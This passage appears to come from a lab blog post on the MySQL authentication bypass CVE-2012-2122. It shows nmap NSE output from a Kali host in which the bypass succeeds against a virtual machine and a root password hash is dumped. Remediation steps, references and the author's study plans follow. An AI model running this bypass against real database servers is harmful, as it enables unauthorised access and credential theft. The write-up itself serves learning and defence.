    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141
    NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142
    NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.
    Completed NSE at 16:13, 0.42s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Nmap scan report for bogon (192.168.118.130)
    Host is up, received arp-response (0.00068s latency).
    Scanned at 2018-08-29 16:13:26 CST for 1s
    PORT     STATE SERVICE REASON         VERSION
    3306/tcp open  mysql   syn-ack ttl 63 MySQL 5.5.23
    | mysql-vuln-cve2012-2122: 
    |   VULNERABLE:
    |   Authentication bypass in MySQL servers.
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2012-2122
    |       When a user connects to MariaDB/MySQL, a token (SHA
    |       over a password and a random scramble string) is calculated and compared
    |       with the expected value. Because of incorrect casting, it might've
    |       happened that the token and the expected value were considered equal,
    |       even if the memcmp() returned a non-zero value. In this case
    |       MySQL/MariaDB would think that the password is correct, even while it is
    |       not.  Because the protocol uses random strings, the probability of
    |       hitting this bug is about 1/256.
    |       Which means, if one knows a user name to connect (and "root" almost
    |       always exists), she can connect using *any* password by repeating
    |       connection attempts. ~300 attempts takes only a fraction of second, so
    |       basically account password protection is as good as nonexistent.
    |       
    |     Disclosure date: 2012-06-9
    |     Extra information:
    |       Server granted access at iteration #1500
    |   
    |     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    |   
    |     References:
    |       http://seclists.org/oss-sec/2012/q2/493
    |       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
    MAC Address: 00:0C:29:25:90:3B (VMware)
    Final times for host: srtt: 677 rttvar: 3967  to: 100000
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Read from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
               Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
    root@kali:~# 
    

    四、Remediation recommendations

    Upgrade to a patched release:
    MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23
    MySQL 5.1.63, 5.5.24, 5.6.6
    Sebug's temporary workaround:
    block the MySQL port (3306/tcp) at the firewall, or at least restrict it to the client hosts that need it.
    Note that whether a given build is actually exploitable depends on its C library, not only on the version number: the bypass only triggers when memcmp() can return values outside -128..127 (as the SSE-optimised glibc memcmp does on some 64-bit Linux builds), which is why official builds on many platforms were not exploitable even though they carried the bug. Verify with the checks in section three rather than trusting the version string alone.

    References:

    http://www.freebuf.com/vuls/3815.html

    http://blog.51cto.com/linuxgeek/998210

    https://www.exploit-db.com/exploits/19092/

    https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

    https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

    Next:

    1、Analyze the MySQL source code (http://blog.51cto.com/linuxgeek/998210) for further study

    2、Analyze the nmap and metasploit scripts to improve script-writing skills

    3、Reproduce the vulnerable environment. So far I have downloaded the corresponding vulnerable MySQL version from the official site and installed it on Windows, but I have not managed to reproduce the bug!

    Original source: https://www.cnblogs.com/zhuxr/p/9553541.html